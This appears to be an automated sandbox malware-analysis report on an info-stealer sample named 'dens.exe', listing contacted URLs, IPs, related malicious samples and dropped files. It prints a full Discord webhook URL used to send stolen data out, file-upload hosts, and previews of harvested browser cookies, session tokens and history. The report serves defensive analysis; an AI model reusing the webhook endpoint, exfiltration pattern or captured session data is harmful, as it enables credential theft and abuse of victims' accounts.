                                                                                                                  high
                                                                                                                  http://docs.python.org/3/library/subprocess#subprocess.Popen.returncodedens.exe, 00000001.00000002.2062990584.000002D9ABAE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000052.00000002.1892866312.00000217AD5A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000034.00000003.1792575862.000001DE906C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drfalse
                                                                                                                        high
                                                                                                                        https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.mdMETADATA14.0.drfalse
                                                                                                                          high
                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamedens.exe, 00000001.00000002.2057356883.000002D9AA7D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://discord.com/api/webhooks/1295868334612418591/QuvcFisisSeqgiaaEigFghTgy3B5fdld_JRxA14GVrqmyygdens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038212780.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2054186252.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040430331.000002D9AC036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/python-attrs/attrs/issues/1330)dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://github.com/jaraco/jaraco.context/actions?query=workflow%3A%22tests%22METADATA.0.drfalse
                                                                                                                                  high
                                                                                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000052.00000002.1892866312.00000217AEE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://importlib-resources.readthedocs.io/en/latest/?badge=latestdens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://pypi.org/project/build/).dens.exe, 00000001.00000002.2062436664.000002D9AB7B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703422725.000002D9AB24E000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703029573.000002D9AB206000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703084861.000002D9AB3D5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062625021.000002D9AB8C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000052.00000002.1892866312.00000217AEE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://github.com/pypa/wheelMETADATA14.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://www.python.org/dev/peps/pep-0427/METADATA14.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readerdens.exe, 00000001.00000003.1694605237.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1694358511.000002D9AA95C000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040028581.000002D9A8F05000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2038808296.000002D9A8EE8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039627706.000002D9A8EF4000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057589696.000002D9AA930000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2057253439.000002D9A8F06000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/python/cpython/issues/86361.dens.exe, 00000001.00000002.2057866234.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695470478.000002D9AAD61000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050249155.000002D9AA9A5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2053260653.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695759119.000002D9AAD61000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695730686.000002D9AACF6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1695759119.000002D9AACF7000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2042588070.000002D9AA996000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2053626399.000002D9AA9A6000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1698481560.000002D9AA97E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://tidelift.com/subscription/pkg/pypi-inflect?utm_source=pypi-inflect&utm_medium=readmedens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000052.00000002.1892866312.00000217AEF03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.apache.org/licenses/dens.exe, 00000000.00000003.1667879346.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://crl.ver)svchost.exe, 00000034.00000002.2911368637.000001DE8AEBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=maindens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-filedens.exe, 00000001.00000002.2068229135.00007FFDFA867000.00000002.00000001.01000000.00000026.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_moduledens.exe, 00000001.00000002.2058377253.000002D9AAB70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachesdens.exe, 00000001.00000002.2058377253.000002D9AAB70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://filepreviews.io/dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://img.shields.io/pypi/v/inflect.svgdens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://www.attrs.org/en/stable/why.html#data-classes)dens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666868851.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1666805611.00000107DAD74000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000052.00000002.1892866312.00000217AEE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://img.shields.io/badge/skeleton-2024-informationaldens.exe, 00000000.00000003.1684040951.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677965330.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1683053302.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr, METADATA15.0.dr, METADATA.0.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-thedens.exe, 00000001.00000003.2042664984.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047151959.000002D9AADC1000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044627162.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2039084149.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2050122173.000002D9AADC2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040864660.000002D9AADB8000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2059354270.000002D9AADC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://cryptography.io/en/latest/installation/dens.exe, 00000000.00000003.1667512860.00000107DAD69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.spotify.com/api/account-settings/v1/profilepdens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://github.com/pypa/setuptools/issues/417#issuecomment-392298401dens.exe, 00000001.00000002.2060074446.000002D9AAF70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://github.com/Pester/Pesterppowershell.exe, 00000052.00000002.1892866312.00000217AD7D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://github.com/Lucretiel/autocommand/issuesdens.exe, 00000000.00000003.1676683442.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.attrs.org/en/stable/changelog.htmldens.exe, 00000000.00000003.1666805611.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.138.232 | unknown | United States | 13335 | CLOUDFLARENETUS | false
162.159.128.233 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
185.199.108.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
45.112.123.126 | api.gofile.io | Singapore | 16509 | AMAZON-02US | false
45.112.123.227 | store1.gofile.io | Singapore | 16509 | AMAZON-02US | false

IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1554825
Start date and time: 2024-11-13 00:37:37 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 84
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: dens.exe
Detection: MAL
Classification: mal100.rans.spre.phis.troj.spyw.evad.winEXE@144/329@5/7
                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                        • Successful, ratio: 50%
                                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                                        • Successful, ratio: 76%
                                                                                                                                                                                                                        • Number of executed functions: 98
                                                                                                                                                                                                                        • Number of non-executed functions: 194
                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 2812 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 8184 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • VT rate limit hit for: dens.exe
Time | Type | Description
18:38:32 | API Interceptor | 7x Sleep call for process: WMIC.exe modified
18:38:40 | API Interceptor | 2x Sleep call for process: svchost.exe modified
18:38:41 | API Interceptor | 13x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Sipari_.exe | malicious | AgentTesla
• ip-api.com/line/?fields=hosting
208.95.112.1 | IgTdifcj7HukYrd.exe | malicious | AgentTesla
• ip-api.com/line/?fields=hosting
208.95.112.1 | Orden de Compra No. 434565344657.exe | malicious | AgentTesla
• ip-api.com/line/?fields=hosting
208.95.112.1 | Pr6Fu6VZK3.exe | malicious | Unknown
• ip-api.com/line/
208.95.112.1 | Pr6Fu6VZK3.exe | malicious | Unknown
• ip-api.com/line/
208.95.112.1 | #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | malicious | Blank Grabber, Creal Stealer
• ip-api.com/line/?fields=hosting
208.95.112.1 | Built.exe | malicious | Blank Grabber
• ip-api.com/line/?fields=hosting
208.95.112.1 | main.exe | malicious | DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT
                                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                                        ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                                                                                                                                        • ip-api.com/xml
                                                                                                                                                                                                                        Sara.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • ip-api.com/csv
                                                                                                                                                                                                                        ypauPrrA08.exeGet hashmaliciousAdes Stealer, BlackGuard, VEGA StealerBrowse
                                                                                                                                                                                                                        • 208.95.112.1
                                                                                                                                                                                                                        CLOUDFLARENETUSfefbBqMKcU.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                        • 172.67.74.152
                                                                                                                                                                                                                        yh5At5T1Zs.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                        • 104.26.12.205
                                                                                                                                                                                                                        https://qacvconsulting.aha.io/shared/9d080aba3b5bbe9dd55708b4063b235aGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.17.25.14
                                                                                                                                                                                                                        https://qacvconsulting.aha.io/shared/9d080aba3b5bbe9dd55708b4063b235aGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.17.25.14
                                                                                                                                                                                                                        https://fileshareiytrardocumentatabajhgaplafa.com/excel/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 104.21.84.87
                                                                                                                                                                                                                        CVMrdORGbI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 172.67.179.113
                                                                                                                                                                                                                        new.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.159.61.3
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                        • 172.67.150.243
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        • 172.67.150.243
                                                                                                                                                                                                                        phish_alert_sp2_2.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 188.114.96.3
                                                                                                                                                                                                                        FASTLYUShttps://qacvconsulting.aha.io/shared/9d080aba3b5bbe9dd55708b4063b235aGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                                        https://qacvconsulting.aha.io/shared/9d080aba3b5bbe9dd55708b4063b235aGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                                        https://sawfish-groundhog-d6h6.squarespace.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 151.101.192.238
                                                                                                                                                                                                                        EXT__Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 151.101.129.44
                                                                                                                                                                                                                        https://disq.us/?url=https%3A%2F%2Fntx.redblocks.io%2F&key=sKOAfZD3HOV0MD3CksmWcgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 151.101.64.64
                                                                                                                                                                                                                        http://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=N_pyUL0QJkeR_KiXHZsVlyTB1Qoy7S9IkE8Ogzl8coFUM1RXUzBHU1RDUjlQOFBPUUE4QVRaS0pPSC4uGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 151.101.66.137
                                                                                                                                                                                                                        original.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                                        https://sites.google.com/lecollectivem.com/rfp/homeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                                        https://lnkfwd.com/u/MhDkLABRGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                        • 151.101.195.52
                                                                                                                                                                                                                        https://welsfargo.com-onlinebanking.com/Xb1ExYUR6VXl0bGxmVDdXaVpyTzlKZUtudEIxbGsxOGY1VzhSNFZvZVlFTDk5T0c2Q25PS3hwcEYrL1dZdG8vVzZIUS9mVHczWklvQ1R0U1ZXaVN0L2RuN0VIbklqdzFUWVROV3E4ZnVldDhWUmZ3RDRZWmFKY0ZJOUlTWWlqWHVxNDlVTUYxYVFDQ1dBWTd0bzVKbGIrL25HZVVOTHNSMnNBcGJuaVRrZW82VHY3RVlnYThxbUpLN2lBPT0tLTRmTmYwUzZkLzlIS1VWQ2otLVNXQlpnWjRKZDUxaGNXQmpCWksyN3c9PQ==?cid=2251351141Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                        • 199.232.196.193
                                                                                                                                                                                                                        No context
| Match | Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\_MEI62482\VCRUNTIME140.dll | client.exe | malicious | Unknown |
| | client.exe | malicious | Unknown |
| | Runtime.exe | malicious | Unknown |
| | #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe | malicious | Blank Grabber, Creal Stealer |
| | Built.exe | malicious | Blank Grabber |
| | windows update.exe | malicious | Unknown |
| | w32e.exe | malicious | Unknown |
| | 3ORCHAMYoz.exe | malicious | Unknown |
| | yuki.exe | malicious | Luna Stealer |
| | CIEfSpAIUS.exe | malicious | Unknown |
                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                                            Entropy (8bit):1.307374740410517
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrb:KooCEYhgYEL0In
                                                                                                                                                                                                                                            MD5:98D03E0F8D99A86AB0ACFCB640E68905
                                                                                                                                                                                                                                            SHA1:36C04F800E18FD5153BAB3C8D09EE33F01F29DD7
                                                                                                                                                                                                                                            SHA-256:0BCDED950CA46CA6C736CCF7680C1228BBFBFBEF384E17F67A0116EE03696430
                                                                                                                                                                                                                                            SHA-512:22A92781C6E8B0F3FA0F34801C11AD4EC9F08992AC85DEDF295E379FD790FA388AEE20937E77AF51525F399A3C3343ECC722170111F6D186CA2651151D55FEC3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6c788e65, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1310720
                                                                                                                                                                                                                                            Entropy (8bit):0.4221719746708719
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
                                                                                                                                                                                                                                            MD5:CFBBBCCE8085777D854698AA8146C7DF
                                                                                                                                                                                                                                            SHA1:1B4DF86344EDF8E3AEAA7817F6950206131B89BC
                                                                                                                                                                                                                                            SHA-256:DD0A0DDB81643AA5819AF5116A243D4345E34852ED3A23335DBCD2C5CA9C8B8F
                                                                                                                                                                                                                                            SHA-512:C0E625D8B93A9BC9745A445C5DABE4499E27B1169423689D11EC0A1D3DCC6BC400AEF3CA41349266142217174310FB330B2F42964F2552AFE9279203DE990C9F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                                            Entropy (8bit):0.07723066764839415
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:9dYe6muc5Cjn13a/7mWytollcVO/lnlZMxZNQl:9dzock53qasOewk
                                                                                                                                                                                                                                            MD5:E17C6F5FFDE3899B30A8C81C0FF23E56
                                                                                                                                                                                                                                            SHA1:91309328CC6346CF3908F19079CD942BA2D2010A
                                                                                                                                                                                                                                            SHA-256:29BA53587B19806A77D35F39819ABA3E5D00766F79CD28951D0E16B77B5DA68B
                                                                                                                                                                                                                                            SHA-512:3597A2F5BE096EF569AF93CC6E96CC21CF083D1E0ADAE2FAC698726C1AFED3C8C43AB401646A097E80F9B155FB89B32F05572016EEF0B984A7EE49D5F24C2078
                                                                                                                                                                                                                                            Malicious:false
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Process:C:\Users\user\Desktop\dens.exe
File Type:Zip archive data, at least v2.0 to extract, compression method=store
Category:dropped
Size (bytes):700483
Entropy (8bit):7.99796892056391
Encrypted:true
SSDEEP:12288:otZnuQ8TeeQU9Ejr8sTa/uGx6HJ3aLE7Wbc5SZ0xEDSb9n2opzUHfGQgsPHuZfa+:otNSTDQyQ8s9FH9aLEabcEZmEDS9n2ov
MD5:46C07A388E1138A3B56A7D82194850AA
SHA1:76A757B833BE2C2DA04F695B392E15F754048FEF
SHA-256:DCE999E9A06A12CB6601C740C0CE2D4F536D62D4F6F3363F1B595CBE8E395D67
SHA-512:81A50DA805827FD57BAD6286E2909AFD5FE520235325CF8ED27E5F4CFC5B2980383C60C9B5977AE39EB22559E328F4B4AAB7C8E984BCF9BF39C62A2A23B22630
Malicious:false
Preview:PK.........lY................Browsers/PK.........lY................Wallets/PK.........lY.^.dc.........Display (1).png
Process:C:\Users\user\Desktop\dens.exe
File Type:ASCII text, with very long lines (522), with CRLF line terminators
Category:dropped
Size (bytes):3485
Entropy (8bit):5.880558909658437
Encrypted:false
SSDEEP:96:L3JMpoO2gFcRqFZL2L+yLstv3pPDYReynqsbCw4R2cksr:tFFRiNEUd7
MD5:1D7CE3DBF44109F28568453671E258B7
SHA1:C5A3D4AD80D6D7221ABB0ECD32978442B853D067
SHA-256:18A6A15B4C803D660F5EBE7AF81D7F2C56DB6477D29617AF0DA2E26F940622B8
SHA-512:C25B46CF6E1B97F0271E69D195C8496C4A4119AA2849CECD8B5194675A6D1559102147E93DB49C94270D8461A3532E6C08953C4A36C775F831CDCB4A1184109D
Malicious:true
Preview:----------------------https://t.me/waltuhium----------------------..======================================================================...google.com.TRUE./.FALSE.13356618603686193.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk..support.microsoft.com.TRUE./.TRUE.13340887435186329..AspNetCore.AuthProvider.True..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359381..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N..support.microsoft.com.TRUE./signin-oidc.TRUE.13340887735359334..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N..support.office.com.TRUE./.TRUE.133725
Process:C:\Users\user\Desktop\dens.exe
File Type:Unicode text, UTF-8 text, with CRLF line terminators
Category:dropped
Size (bytes):1734
Entropy (8bit):4.129413584613241
Encrypted:false
SSDEEP:24:L+xsMvXvxsajXJl1QXbsBQXY6CQExXBYGQFEDK4:LGlVVgmHgWdIoV
MD5:3DE5FD5C445A9C1154AA34A5413FE75E
SHA1:3E38D3C8483DA8D77CA85435D5574BD21F8446C9
SHA-256:83920E786DFC95B7314C919883286AC1F57EB3FD16F91606C12956F1E6BF6107
SHA-512:F7230C9C318D46DE224CD2BEDAFFEFFC89C16833E7414BE27598A1BEC0C8626C2586B28932AB849C277A3FF5743A11FD1F3AAC2F17B55AB91E4F887713A39B5D
Malicious:true
Preview:----------------------https://t.me/waltuhium----------------------..======================================================================..ID: 1..RL: https://support.mozilla.org/products/firefox..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 2..RL: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-browser&utm_medium=default-bookmarks&utm_campaign=customize..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 3..RL: https://www.mozilla.org/contribute/..Title: None..Visit Count: 0..Last Visit Time: None..====================================================================================..ID: 4..RL: https://www.mozilla.org/about/..Title: None..Visit Count: 0..Last Visit Time: None..============================================================================
Process:C:\Users\user\Desktop\dens.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):2725
Entropy (8bit):4.658114526716016
Encrypted:false
